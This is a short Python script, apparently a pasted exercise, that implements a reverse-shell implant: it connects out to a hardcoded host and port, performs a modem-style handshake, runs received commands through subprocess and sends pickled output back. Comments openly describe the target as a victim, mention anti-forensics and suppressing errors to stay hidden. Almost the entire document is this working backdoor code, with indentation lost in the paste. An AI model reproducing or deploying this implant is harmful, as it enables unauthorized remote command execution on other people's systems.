#!/usr/bin/python# Task: Implement a server to run on an Ubuntu system. It m

1. #!/usr/bin/python
2.  
3. # Task: Implement a server to run on an Ubuntu system. It must:
4. # -- hold a port
5. # -- receive commands -- in the form of command-line arguments
6. # -- execute commands -- via os library
7. # -- return the results -- capture stdout/stderr...
8.  
9. # immediate considerations:
10. # we'll need sockets
11. # we'll need pickling or json-ing; i think i'll prefer the pickle to impose
12. # antiforensics costs
13.  
14. # Must EITHER callback OR listen... I think I'd rather...have it call back.
15. # That means the client will bind and the server will...well that's an odd
16. # way of thinking about it; having a server initiate the connection? I'm kindof
17. # reversing the paradigm there...but once the connection is established, the server
18. # will service client activity, so we'll just roll with that.
19.  
20. import socket
21. import os # return values
22. import ipaddress # Is this necessary?
23. import re # for passphrase
24. import sys # for exit
25. import subprocess # for commands
26. import pickle # for transfer
27. import select # for black magic
28.  
29. trinity = "10.0.2.15"
30. nebuchadnezzar = 31337
31.  
32. def sessionStartup(s):
33. # We're using a magic string for our initialization; we'll try 3 times and otherwise fail out.
34. for i in range(1,3):
35. s.sendto("ATDT18005551234".encode(), (trinity,nebuchadnezzar))
36. signal = s.recv(512)
37. if re.search("ATA", signal.decode()):
38. s.sendto("CONNECT".encode(), (trinity, nebuchadnezzar))
39. return True
40. # If Trinity doesn't pick up, we're screwed
41. return False
42.  
43.  
44.  
45. def main():
46. # What, do you think I'd print a banner for the victim? Pshaw.
47. # print("Initializing server. Please stand by while your system initiates an unauthorized connection...")
48. #s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # Aren't these the default parameters?
49. startup = False
50.  
51. while True:
52. try:
53. #s.connect((trinity, nebuchadnezzar)) # Tee-hee
54. s = socket.create_connection((trinity, nebuchadnezzar))
55. s.setsockopt(socket.SOL_SOCKET, socket.SO_KEEPALIVE, 1)
56. s.setsockopt(socket.IPPROTO_TCP, socket.TCP_KEEPIDLE, 1)
57. s.setsockopt(socket.IPPROTO_TCP, socket.TCP_KEEPINTVL, 3)
58. s.setsockopt(socket.IPPROTO_TCP, socket.TCP_KEEPCNT, 5)
59. except OSError as e:
60. # As they say in PowerShell...SilentlyContinue
61. return -1
62. if not startup:
63. result = sessionStartup(s)
64. startup = True
65. if not result:
66. return -1
67. with s:
68. print("I'm listening")
69. instruction = s.recv(4096)
70. parsedInstructions = instruction.decode().split()
71. try:
72. results = subprocess.run(parsedInstructions, capture_output=True)
73. p = pickle.dumps(results)
74. except OSError as e:
75. msg = f"Error encountered: {e}"
76. p = pickle.dumps(msg)
77. try:
78. s.sendall(p)
79. except OSError as e:
80. print(f"Error encountered: {e}")
81.  
82.  
83.  
84.  
85. if __name__ == "__main__":
86. sys.exit(main())